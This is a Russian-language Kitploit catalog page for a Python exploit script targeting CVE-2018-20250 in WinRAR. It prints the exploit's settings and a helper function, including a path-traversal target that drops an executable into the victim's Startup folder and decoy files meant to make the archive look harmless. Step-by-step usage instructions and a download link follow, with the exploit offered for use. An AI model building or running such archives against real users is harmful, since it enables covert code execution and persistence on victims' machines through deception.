Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2018-20250 — Эксплойт-скрипт на Python для CVE-2018-20250, который создает вредоносный RAR-архив для выполнения кода через уязвимость извлечения ACE-файлов в WinRAR, нацеленный на закрепление в папке автозагрузки. | Kitploit
Инструменты/GitHubGitHub/likekabin/cve-2018-20250
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHublikekabin/cve-2018-20250

CVE-2018-20250

Эксплойт-скрипт на Python для CVE-2018-20250, который создает вредоносный RAR-архив для выполнения кода через уязвимость извлечения ACE-файлов в WinRAR, нацеленный на закрепление в папке автозагрузки.

Репозиторий
7 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

exp для Извлечение выполнения кода из Winrar

poc от Ridter

как использовать?

вам нужно лишь установить Python 3.7 и подготовить вредоносный файл, который вы хотите запустить, задать нужные значения, этот exp-скрипт автоматически сгенерирует вредоносный архивный файл!

  1. задайте нужные значения
root@kitploit:~
... ...

# The archive filename you want
rar_filename = "test.rar"
# The evil file you want to run
evil_filename = "calc.exe"
# The decompression path you want, such shown below
target_filename = r"C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hi.exe"
# Other files to be displayed when the victim opens the winrar
# filename_list=[]
filename_list = ["hello.txt", "world.txt"]

... ...

def get_right_hdr_crc(filename):
    # This command may be different, it depends on the your Python3 environment.
    p = os.popen('py -3 acefile.py --headers %s'%(filename))
    res = p.read()
    pattern = re.compile('right_hdr_crc : 0x(.*?) | struct')
    result = pattern.findall(res)
    right_hdr_crc = result[0].upper()
    return hex2raw4(right_hdr_crc)

... ...

  1. запустите exp, exp автоматически создаст test.rar

  1. если жертва откроет test.rar, она увидит файлы hello.txt и world.txt, вы также можете добавить больше файлов, более привлекательных

  1. когда она распакует файл, в каталоге автозагрузки пользователя появится ещё один файл с именем hi.exe, на самом деле это calc.exe. при перезагрузке компьютера hi.exe запустится

удачи! :)

Скачать инструмент